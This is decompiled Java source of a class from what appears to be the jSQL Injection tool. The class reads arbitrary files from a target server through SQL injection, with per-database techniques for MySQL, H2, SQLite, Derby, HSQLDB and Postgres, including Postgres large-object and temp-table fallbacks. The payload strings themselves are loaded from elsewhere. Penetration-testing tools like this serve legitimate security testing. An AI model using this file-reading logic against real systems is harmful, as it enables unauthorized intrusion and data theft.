/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible;

import com.jsql.model.InjectionModel;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.exception.InjectionFailureException;
import com.jsql.model.exception.LoopDetectedSlidingException;
import com.jsql.model.exception.StoppedByUserSlidingException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.LogLevelUtil;
import java.nio.charset.StandardCharsets;
import java.util.concurrent.Callable;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class CallableFile
implements Callable<CallableFile> {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private static final String REQUIRE_STACK = "Read file requirement : stack query";
    private final String pathFile;
    private String sourceFile = "";
    private final SuspendableGetRows suspendableReadFile;
    private final InjectionModel injectionModel;

    public CallableFile(String pathFile, InjectionModel injectionModel) {
        this.pathFile = pathFile;
        this.injectionModel = injectionModel;
        this.suspendableReadFile = new SuspendableGetRows(injectionModel);
    }

    @Override
    public CallableFile call() throws Exception {
        String[] sourcePage = new String[]{""};
        String resultToParse = "";
        try {
            if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getMysql()) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Read file requirement : user FILE privilege");
                resultToParse = this.suspendableReadFile.run(this.injectionModel.getResourceAccess().getExploitMysql().getModelYaml().getFile().getRead().replace("${filepath.hex}", Hex.encodeHexString(this.pathFile.getBytes(StandardCharsets.UTF_8))), sourcePage, false, 1, MockElement.MOCK, "file#read");
            } else if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getH2()) {
                resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitH2().getModelYaml().getFile().getReadFromPath(), this.pathFile), sourcePage, false, 1, MockElement.MOCK, "file#read");
            } else if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getSqlite()) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Read file requirement : extension fileio loaded");
                resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitSqlite().getModelYaml().getExtension().getFileioRead(), this.pathFile), sourcePage, false, 1, MockElement.MOCK, "file#read");
            } else if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getDerby()) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, REQUIRE_STACK);
                String nameTable = RandomStringUtils.secure().nextAlphabetic(8);
                this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitDerby().getModelYaml().getFile().getCreateTable(), nameTable, nameTable, this.pathFile), "tbl#fill");
                resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitDerby().getModelYaml().getFile().getRead(), nameTable), sourcePage, true, 0, MockElement.MOCK, "file#read");
            } else if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getHsqldb()) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, REQUIRE_STACK);
                String nameTable = RandomStringUtils.secure().nextAlphabetic(8);
                this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getCreateTable(), nameTable, nameTable, this.pathFile), "tbl#fill");
                resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getResult(), "%01%03%03%07", nameTable), sourcePage, false, 1, MockElement.MOCK, "tbl#read");
            } else if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getPostgres()) {
                try {
                    resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getFromDataFolder(), this.pathFile), sourcePage, false, 1, MockElement.MOCK, "file#read");
                }
                catch (InjectionFailureException e) {
                    LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Read data folder failure, trying with large object");
                    String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getLargeObject().getFromPath(), this.pathFile), "loid#create");
                    if (StringUtils.isNotEmpty(loid)) {
                        resultToParse = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getLargeObject().getToText(), loid), "loid#read");
                    }
                    if (StringUtils.isEmpty(resultToParse)) {
                        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Read large object failure, trying with stack read");
                        String nameLibraryRandom = "tmp_" + RandomStringUtils.secure().nextAlphabetic(8);
                        this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getDrop(), nameLibraryRandom), "tbl#drop");
                        this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getAdd(), nameLibraryRandom), "tbl#create");
                        this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getFill(), nameLibraryRandom, this.pathFile), "tbl#fill");
                        resultToParse = this.suspendableReadFile.run(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getFromTempTable(), nameLibraryRandom), sourcePage, false, 1, MockElement.MOCK, "tbl#read");
                    }
                }
            } else {
                LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Read file not implemented for [{}], share a working example to GitHub to speed up release", (Object)this.injectionModel.getMediatorVendor().getVendor());
            }
        }
        catch (InjectionFailureException e) {
            LOGGER.log(LogLevelUtil.IGNORE, e);
        }
        catch (LoopDetectedSlidingException | StoppedByUserSlidingException e) {
            if (StringUtils.isNotEmpty(e.getSlidingWindowAllRows())) {
                resultToParse = e.getSlidingWindowAllRows();
            } else if (StringUtils.isNotEmpty(e.getSlidingWindowCurrentRows())) {
                resultToParse = e.getSlidingWindowCurrentRows();
            }
            LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e);
        }
        this.sourceFile = resultToParse;
        return this;
    }

    public String getPathFile() {
        return this.pathFile;
    }

    public String getSourceFile() {
        return this.sourceFile;
    }

    public SuspendableGetRows getSuspendableReadFile() {
        return this.suspendableReadFile;
    }
}

